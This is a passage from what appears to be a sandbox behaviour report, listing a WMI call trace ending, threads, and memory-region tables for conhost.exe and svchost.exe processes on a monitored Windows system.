(This=0xc30cf0) returned 0x0 [0121.872] IUnknown:Release (This=0xc30c00) returned 0x0 [0121.873] WbemLocator:IUnknown:Release (This=0xc071c0) returned 0x1 [0121.873] ?Empty@CHString@@QAEXXZ () returned 0x73be6424 [0121.873] WbemLocator:IUnknown:Release (This=0xc071c0) returned 0x0 [0121.874] CoUninitialize () [0121.899] exit (_Code=-2147217388) [0121.900] ??1CHString@@QAE@XZ () returned 0x73be6430 [0121.900] ??1CHString@@QAE@XZ () returned 0x73be6430 Thread: id = 20 os_tid = 0x1f4 Thread: id = 21 os_tid = 0x2dc Thread: id = 22 os_tid = 0x904 Thread: id = 23 os_tid = 0x3d4 Thread: id = 24 os_tid = 0x87c Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x35c51000" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x134" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5316 start_va = 0x7fb02000 end_va = 0x7fb02fff entry_point = 0x0 region_type = private name = "private_0x000000007fb02000" filename = "" Region: id = 5317 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5318 start_va = 0x6cfc1c0000 end_va = 0x6cfc1dffff entry_point = 0x0 region_type = private name = "private_0x0000006cfc1c0000" filename = "" Region: id = 5319 start_va = 0x6cfc1e0000 end_va = 0x6cfc1f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc1e0000" filename = "" Region: id = 5320 start_va = 0x6cfc200000 end_va = 0x6cfc23ffff entry_point = 0x0 region_type = private name = "private_0x0000006cfc200000" filename = "" Region: id = 5321 start_va = 0x7df5ff620000 end_va = 0x7ff5ff61ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff620000" filename = "" Region: id = 5322 start_va = 0x7ff6c4460000 end_va = 0x7ff6c4482fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4460000" filename = "" Region: id = 5323 start_va = 0x7ff6c448d000 end_va = 0x7ff6c448efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c448d000" filename = "" Region: id = 5324 start_va = 0x7ff6c448f000 end_va = 0x7ff6c448ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c448f000" filename = "" Region: id = 5325 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5326 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5327 start_va = 0x6cfc3b0000 end_va = 0x6cfc4affff entry_point = 0x0 region_type = private name = "private_0x0000006cfc3b0000" filename = "" Region: id = 5328 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5329 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5330 start_va = 0x6cfc1c0000 end_va = 0x6cfc1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc1c0000" filename = "" Region: id = 5331 start_va = 0x6cfc240000 end_va = 0x6cfc2fdfff entry_point = 0x6cfc240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5332 start_va = 0x6cfc300000 end_va = 0x6cfc33ffff entry_point = 0x0 region_type = private name = "private_0x0000006cfc300000" filename = "" Region: id = 5333 start_va = 0x7ff6c4360000 end_va = 0x7ff6c445ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4360000" filename = "" Region: id = 5334 start_va = 0x7ff6c448b000 end_va = 0x7ff6c448cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c448b000" filename = "" Region: id = 5335 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5336 start_va = 0x6cfc1d0000 end_va = 0x6cfc1d6fff entry_point = 0x0 region_type = private name = "private_0x0000006cfc1d0000" filename = "" Region: id = 5337 start_va = 0x6cfc340000 end_va = 0x6cfc340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc340000" filename = "" Region: id = 5338 start_va = 0x6cfc350000 end_va = 0x6cfc356fff entry_point = 0x0 region_type = private name = "private_0x0000006cfc350000" filename = "" Region: id = 5339 start_va = 0x6cfc5e0000 end_va = 0x6cfc5effff entry_point = 0x0 region_type = private name = "private_0x0000006cfc5e0000" filename = "" Region: id = 5340 start_va = 0x7ffbeaf40000 end_va = 0x7ffbeaf92fff entry_point = 0x7ffbeaf40000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5341 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5342 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5343 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5344 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5345 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5346 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5347 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5348 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5349 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5350 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5351 start_va = 0x6cfc360000 end_va = 0x6cfc360fff entry_point = 0x0 region_type = private name = "private_0x0000006cfc360000" filename = "" Region: id = 5352 start_va = 0x6cfc370000 end_va = 0x6cfc370fff entry_point = 0x0 region_type = private name = "private_0x0000006cfc370000" filename = "" Region: id = 5353 start_va = 0x6cfc4b0000 end_va = 0x6cfc4effff entry_point = 0x0 region_type = private name = "private_0x0000006cfc4b0000" filename = "" Region: id = 5354 start_va = 0x6cfc5f0000 end_va = 0x6cfc777fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc5f0000" filename = "" Region: id = 5355 start_va = 0x6cfc780000 end_va = 0x6cfc900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc780000" filename = "" Region: id = 5356 start_va = 0x6cfc910000 end_va = 0x6cfdd0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc910000" filename = "" Region: id = 5357 start_va = 0x6cfdf00000 end_va = 0x6cfdf0ffff entry_point = 0x0 region_type = private name = "private_0x0000006cfdf00000" filename = "" Region: id = 5358 start_va = 0x7ff6c4489000 end_va = 0x7ff6c448afff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4489000" filename = "" Region: id = 5359 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5360 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5361 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5362 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5363 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5364 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5365 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5366 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5367 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5368 start_va = 0x6cfc200000 end_va = 0x6cfc23ffff entry_point = 0x0 region_type = private name = "private_0x0000006cfc200000" filename = "" Region: id = 5369 start_va = 0x6cfc380000 end_va = 0x6cfc383fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc380000" filename = "" Region: id = 5370 start_va = 0x6cfc4f0000 end_va = 0x6cfc5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc4f0000" filename = "" Region: id = 5371 start_va = 0x6cfdd10000 end_va = 0x6cfde23fff entry_point = 0x0 region_type = private name = "private_0x0000006cfdd10000" filename = "" Region: id = 5372 start_va = 0x6cfdef0000 end_va = 0x6cfdefffff entry_point = 0x0 region_type = private name = "private_0x0000006cfdef0000" filename = "" Region: id = 5373 start_va = 0x6cfdf10000 end_va = 0x6cfe246fff entry_point = 0x6cfdf10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5374 start_va = 0x6cfe250000 end_va = 0x6cfe46bfff entry_point = 0x0 region_type = private name = "private_0x0000006cfe250000" filename = "" Region: id = 5375 start_va = 0x6cfe470000 end_va = 0x6cfe681fff entry_point = 0x0 region_type = private name = "private_0x0000006cfe470000" filename = "" Region: id = 5376 start_va = 0x6cfe690000 end_va = 0x6cfe8a4fff entry_point = 0x0 region_type = private name = "private_0x0000006cfe690000" filename = "" Region: id = 5377 start_va = 0x6cfe8b0000 end_va = 0x6cfe9bafff entry_point = 0x0 region_type = private name = "private_0x0000006cfe8b0000" filename = "" Region: id = 5378 start_va = 0x7ff6c448d000 end_va = 0x7ff6c448efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c448d000" filename = "" Region: id = 5379 start_va = 0x7ffbfe9a0000 end_va = 0x7ffbfe9c1fff entry_point = 0x7ffbfe9a0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5380 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5381 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5382 start_va = 0x6cfc390000 end_va = 0x6cfc396fff entry_point = 0x0 region_type = private name = "private_0x0000006cfc390000" filename = "" Region: id = 5383 start_va = 0x6cfc3a0000 end_va = 0x6cfc3a4fff entry_point = 0x6cfc3a0000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 5384 start_va = 0x6cfc5b0000 end_va = 0x6cfc5b0fff entry_point = 0x6cfc5b0000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 5385 start_va = 0x6cfc5c0000 end_va = 0x6cfc5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006cfc5c0000" filename = "" Region: id = 5386 start_va = 0x7ffbfb2d0000 end_va = 0x7ffbfb543fff entry_point = 0x7ffbfb2d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Thread: id = 16 os_tid = 0x350 Thread: id = 17 os_tid = 0x788 Thread: id = 18 os_tid = 0xbc4 Thread: id = 19 os_tid = 0xb00 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x54043000" os_pid = "0x378" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x134" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e0e3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5476 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5477 start_va = 0x51e5e10000 end_va = 0x51e5e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5e10000" filename = "" Region: id = 5478 start_va = 0x51e5e20000 end_va = 0x51e5e20fff entry_point = 0x51e5e20000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 5479 start_va = 0x51e5e30000 end_va = 0x51e5e43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5e30000" filename = "" Region: id = 5480 start_va = 0x51e5e50000 end_va = 0x51e5ecffff entry_point = 0x0 region_type = private name = "private_0x00000051e5e50000" filename = "" Region: id = 5481 start_va = 0x51e5ed0000 end_va = 0x51e5ed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5ed0000" filename = "" Region: id = 5482 start_va = 0x51e5ee0000 end_va = 0x51e5ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5ee0000" filename = "" Region: id = 5483 start_va = 0x51e5ef0000 end_va = 0x51e5ef1fff entry_point = 0x0 region_type = private name = "private_0x00000051e5ef0000" filename = "" Region: id = 5484 start_va = 0x51e5f00000 end_va = 0x51e5fbdfff entry_point = 0x51e5f00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5485 start_va = 0x51e5fc0000 end_va = 0x51e5fc0fff entry_point = 0x0 region_type = private name = "private_0x00000051e5fc0000" filename = "" Region: id = 5486 start_va = 0x51e5fd0000 end_va = 0x51e5fd6fff entry_point = 0x0 region_type = private name = "private_0x00000051e5fd0000" filename = "" Region: id = 5487 start_va = 0x51e5fe0000 end_va = 0x51e5fe0fff entry_point = 0x0 region_type = private name = "private_0x00000051e5fe0000" filename = "" Region: id = 5488 start_va = 0x51e5ff0000 end_va = 0x51e5ff0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e5ff0000" filename = "" Region: id = 5489 start_va = 0x51e6000000 end_va = 0x51e60fffff entry_point = 0x0 region_type = private name = "private_0x00000051e6000000" filename = "" Region: id = 5490 start_va = 0x51e6100000 end_va = 0x51e617ffff entry_point = 0x0 region_type = private name = "private_0x00000051e6100000" filename = "" Region: id = 5491 start_va = 0x51e6180000 end_va = 0x51e6180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6180000" filename = "" Region: id = 5492 start_va = 0x51e6190000 end_va = 0x51e6190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6190000" filename = "" Region: id = 5493 start_va = 0x51e61a0000 end_va = 0x51e61a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e61a0000" filename = "" Region: id = 5494 start_va = 0x51e61b0000 end_va = 0x51e61b6fff entry_point = 0x0 region_type = private name = "private_0x00000051e61b0000" filename = "" Region: id = 5495 start_va = 0x51e61c0000 end_va = 0x51e61c3fff entry_point = 0x51e61c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5496 start_va = 0x51e61d0000 end_va = 0x51e61d3fff entry_point = 0x51e61d0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5497 start_va = 0x51e61e0000 end_va = 0x51e61e6fff entry_point = 0x0 region_type = private name = "private_0x00000051e61e0000" filename = "" Region: id = 5498 start_va = 0x51e61f0000 end_va = 0x51e61fcfff entry_point = 0x51e61f0000 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 5499 start_va = 0x51e6200000 end_va = 0x51e62fffff entry_point = 0x0 region_type = private name = "private_0x00000051e6200000" filename = "" Region: id = 5500 start_va = 0x51e6300000 end_va = 0x51e6487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6300000" filename = "" Region: id = 5501 start_va = 0x51e6490000 end_va = 0x51e6610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6490000" filename = "" Region: id = 5502 start_va = 0x51e6620000 end_va = 0x51e66dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6620000" filename = "" Region: id = 5503 start_va = 0x51e66e0000 end_va = 0x51e675ffff entry_point = 0x0 region_type = private name = "private_0x00000051e66e0000" filename = "" Region: id = 5504 start_va = 0x51e6760000 end_va = 0x51e67dffff entry_point = 0x0 region_type = private name = "private_0x00000051e6760000" filename = "" Region: id = 5505 start_va = 0x51e67e0000 end_va = 0x51e68dffff entry_point = 0x0 region_type = private name = "private_0x00000051e67e0000" filename = "" Region: id = 5506 start_va = 0x51e68e0000 end_va = 0x51e69dffff entry_point = 0x0 region_type = private name = "private_0x00000051e68e0000" filename = "" Region: id = 5507 start_va = 0x51e69e0000 end_va = 0x51e6adffff entry_point = 0x0 region_type = private name = "private_0x00000051e69e0000" filename = "" Region: id = 5508 start_va = 0x51e6ae0000 end_va = 0x51e6b22fff entry_point = 0x51e6ae0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000b.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000b.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000b.db") Region: id = 5509 start_va = 0x51e6b30000 end_va = 0x51e6b40fff entry_point = 0x51e6b30000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 5510 start_va = 0x51e6b50000 end_va = 0x51e6b56fff entry_point = 0x0 region_type = private name = "private_0x00000051e6b50000" filename = "" Region: id = 5511 start_va = 0x51e6b60000 end_va = 0x51e6b77fff entry_point = 0x0 region_type = private name = "private_0x00000051e6b60000" filename = "" Region: id = 5512 start_va = 0x51e6b80000 end_va = 0x51e6b80fff entry_point = 0x51e6b80000 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 5513 start_va = 0x51e6b90000 end_va = 0x51e6b96fff entry_point = 0x0 region_type = private name = "private_0x00000051e6b90000" filename = "" Region: id = 5514 start_va = 0x51e6ba0000 end_va = 0x51e6ba0fff entry_point = 0x51e6ba0000 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 5515 start_va = 0x51e6bb0000 end_va = 0x51e6bb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6bb0000" filename = "" Region: id = 5516 start_va = 0x51e6bc0000 end_va = 0x51e6bc4fff entry_point = 0x51e6bc0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 5517 start_va = 0x51e6bd0000 end_va = 0x51e6bdffff entry_point = 0x51e6bd0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 5518 start_va = 0x51e6be0000 end_va = 0x51e6be1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e6be0000" filename = "" Region: id = 5519 start_va = 0x51e6bf0000 end_va = 0x51e6bfcfff entry_point = 0x51e6bf0000 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 5520 start_va = 0x51e6c00000 end_va = 0x51e6cfffff entry_point = 0x0 region_type = private name = "private_0x00000051e6c00000" filename = "" Region: id = 5521 start_va = 0x51e6d00000 end_va = 0x51e7036fff entry_point = 0x51e6d00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5522 start_va = 0x51e7040000 end_va = 0x51e713ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7040000" filename = "" Region: id = 5523 start_va = 0x51e7140000 end_va = 0x51e723ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7140000" filename = "" Region: id = 5524 start_va = 0x51e7240000 end_va = 0x51e733ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7240000" filename = "" Region: id = 5525 start_va = 0x51e7340000 end_va = 0x51e743ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7340000" filename = "" Region: id = 5526 start_va = 0x51e7440000 end_va = 0x51e74bffff entry_point = 0x0 region_type = private name = "private_0x00000051e7440000" filename = "" Region: id = 5527 start_va = 0x51e74c0000 end_va = 0x51e74c8fff entry_point = 0x51e74c0000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 5528 start_va = 0x51e74d0000 end_va = 0x51e74d6fff entry_point = 0x0 region_type = private name = "private_0x00000051e74d0000" filename = "" Region: id = 5529 start_va = 0x51e74e0000 end_va = 0x51e74e1fff entry_point = 0x51e74e0000 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 5530 start_va = 0x51e74f0000 end_va = 0x51e74f2fff entry_point = 0x51e74f0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 5531 start_va = 0x51e7500000 end_va = 0x51e75fffff entry_point = 0x0 region_type = private name = "private_0x00000051e7500000" filename = "" Region: id = 5532 start_va = 0x51e7600000 end_va = 0x51e76fffff entry_point = 0x0 region_type = private name = "private_0x00000051e7600000" filename = "" Region: id = 5533 start_va = 0x51e7700000 end_va = 0x51e777ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7700000" filename = "" Region: id = 5534 start_va = 0x51e7780000 end_va = 0x51e787ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7780000" filename = "" Region: id = 5535 start_va = 0x51e7880000 end_va = 0x51e797ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7880000" filename = "" Region: id = 5536 